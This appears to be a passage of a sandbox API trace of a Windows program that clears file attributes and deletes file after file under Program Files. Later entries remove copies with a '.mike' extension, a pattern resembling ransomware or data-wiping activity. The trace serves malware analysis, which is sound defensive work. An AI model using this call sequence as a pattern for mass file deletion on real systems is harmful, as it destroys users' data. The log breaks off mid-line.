[0054.283] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.283] CoTaskMemFree (pv=0x4e1c10) [0054.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.291] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1 [0054.293] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.293] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.293] CoTaskMemFree (pv=0x4e1c10) [0054.294] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.301] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1 [0054.303] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.303] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.303] CoTaskMemFree (pv=0x4e1c10) [0054.303] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.310] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1 [0054.312] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.312] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.312] CoTaskMemFree (pv=0x4e1c10) [0054.313] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.319] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1 [0054.321] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.321] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.321] CoTaskMemFree (pv=0x4e1c10) [0054.322] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.327] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1 [0054.330] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.330] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.330] CoTaskMemFree (pv=0x4e1c10) [0054.331] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.336] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1 [0054.338] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.338] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.338] CoTaskMemFree (pv=0x4e1c10) [0054.340] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.345] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1 [0054.347] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.347] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.347] CoTaskMemFree (pv=0x4e1c10) [0054.351] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.360] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1 [0054.362] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.362] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.362] CoTaskMemFree (pv=0x4e1c10) [0054.363] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.368] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1 [0054.370] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.370] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.370] CoTaskMemFree (pv=0x4e1c10) [0054.371] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.378] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1 [0054.380] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.380] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.380] CoTaskMemFree (pv=0x4e1c10) [0054.381] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.388] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1 [0054.390] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.390] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.390] CoTaskMemFree (pv=0x4e1c10) [0054.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.397] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1 [0054.399] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.399] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.399] CoTaskMemFree (pv=0x4e1c10) [0054.404] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.404] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.404] CoTaskMemFree (pv=0x4e1c10) [0054.407] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.407] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.407] CoTaskMemFree (pv=0x4e1c10) [0054.408] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.408] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.408] CoTaskMemFree (pv=0x4e1c10) [0054.408] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.408] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.408] CoTaskMemFree (pv=0x4e1c10) [0054.409] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.409] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.409] CoTaskMemFree (pv=0x4e1c10) [0054.410] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.410] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.410] CoTaskMemFree (pv=0x4e1c10) [0054.411] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.411] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.411] CoTaskMemFree (pv=0x4e1c10) [0054.411] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.411] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.411] CoTaskMemFree (pv=0x4e1c10) [0054.412] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.412] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.412] CoTaskMemFree (pv=0x4e1c10) [0054.415] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.415] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.415] CoTaskMemFree (pv=0x4e1c10) [0054.416] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.416] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.416] CoTaskMemFree (pv=0x4e1c10) [0054.419] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.419] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.420] CoTaskMemFree (pv=0x4e1c10) [0054.420] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.420] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.421] CoTaskMemFree (pv=0x4e1c10) [0054.421] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.421] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.421] CoTaskMemFree (pv=0x4e1c10) [0054.425] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.425] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.425] CoTaskMemFree (pv=0x4e1c10) [0054.429] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.429] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.429] CoTaskMemFree (pv=0x4e1c10) [0054.430] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.430] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.430] CoTaskMemFree (pv=0x4e1c10) [0054.435] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config", dwFileAttributes=0x80) returned 1 [0054.439] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1 [0054.441] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.441] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.442] CoTaskMemFree (pv=0x4e1c10) [0054.445] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.445] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.445] CoTaskMemFree (pv=0x4e1c10) [0054.446] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.446] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.447] CoTaskMemFree (pv=0x4e1c10) [0054.447] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.447] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.447] CoTaskMemFree (pv=0x4e1c10) [0054.448] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.448] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.448] CoTaskMemFree (pv=0x4e1c10) [0054.448] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.448] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.448] CoTaskMemFree (pv=0x4e1c10) [0054.449] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.449] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.449] CoTaskMemFree (pv=0x4e1c10) [0054.449] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0054.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG", dwFileAttributes=0x80) returned 1 [0054.466] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1 [0054.469] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.469] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.469] CoTaskMemFree (pv=0x4e1c10) [0054.470] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.470] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.470] CoTaskMemFree (pv=0x4e1c10) [0054.470] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.470] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.470] CoTaskMemFree (pv=0x4e1c10) [0054.471] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.471] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.471] CoTaskMemFree (pv=0x4e1c10) [0054.471] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.471] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.472] CoTaskMemFree (pv=0x4e1c10) [0054.472] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.472] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.472] CoTaskMemFree (pv=0x4e1c10) [0054.472] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.472] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.472] CoTaskMemFree (pv=0x4e1c10) [0054.476] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.476] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.476] CoTaskMemFree (pv=0x4e1c10) [0054.483] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.483] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.483] CoTaskMemFree (pv=0x4e1c10) [0054.484] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.484] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.484] CoTaskMemFree (pv=0x4e1c10) [0054.484] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.484] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.484] CoTaskMemFree (pv=0x4e1c10) [0054.489] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.489] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.489] CoTaskMemFree (pv=0x4e1c10) [0054.493] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.493] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.493] CoTaskMemFree (pv=0x4e1c10) [0054.494] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.494] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.494] CoTaskMemFree (pv=0x4e1c10) [0054.494] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.494] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.494] CoTaskMemFree (pv=0x4e1c10) [0054.498] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.498] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.498] CoTaskMemFree (pv=0x4e1c10) [0054.499] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.499] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.499] CoTaskMemFree (pv=0x4e1c10) [0054.503] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.503] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.503] CoTaskMemFree (pv=0x4e1c10) [0054.504] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.504] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.504] CoTaskMemFree (pv=0x4e1c10) [0054.512] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0054.518] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", dwFileAttributes=0x80) returned 0 [0054.520] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png.mike")) returned 1 [0054.522] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0054.601] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", dwFileAttributes=0x80) returned 0 [0054.602] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png.mike")) returned 1 [0054.607] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0054.613] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml", dwFileAttributes=0x80) returned 0 [0054.614] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.mike" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml.mike")) returned 1 [0054.615] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.615] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.615] CoTaskMemFree (pv=0x4e1c10) [0054.625] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.630] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", dwFileAttributes=0x80) returned 0 [0054.631] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.mike")) returned 1 [0054.633] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.637] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.638] DeleteFileW (lpFileName="C:\\Program 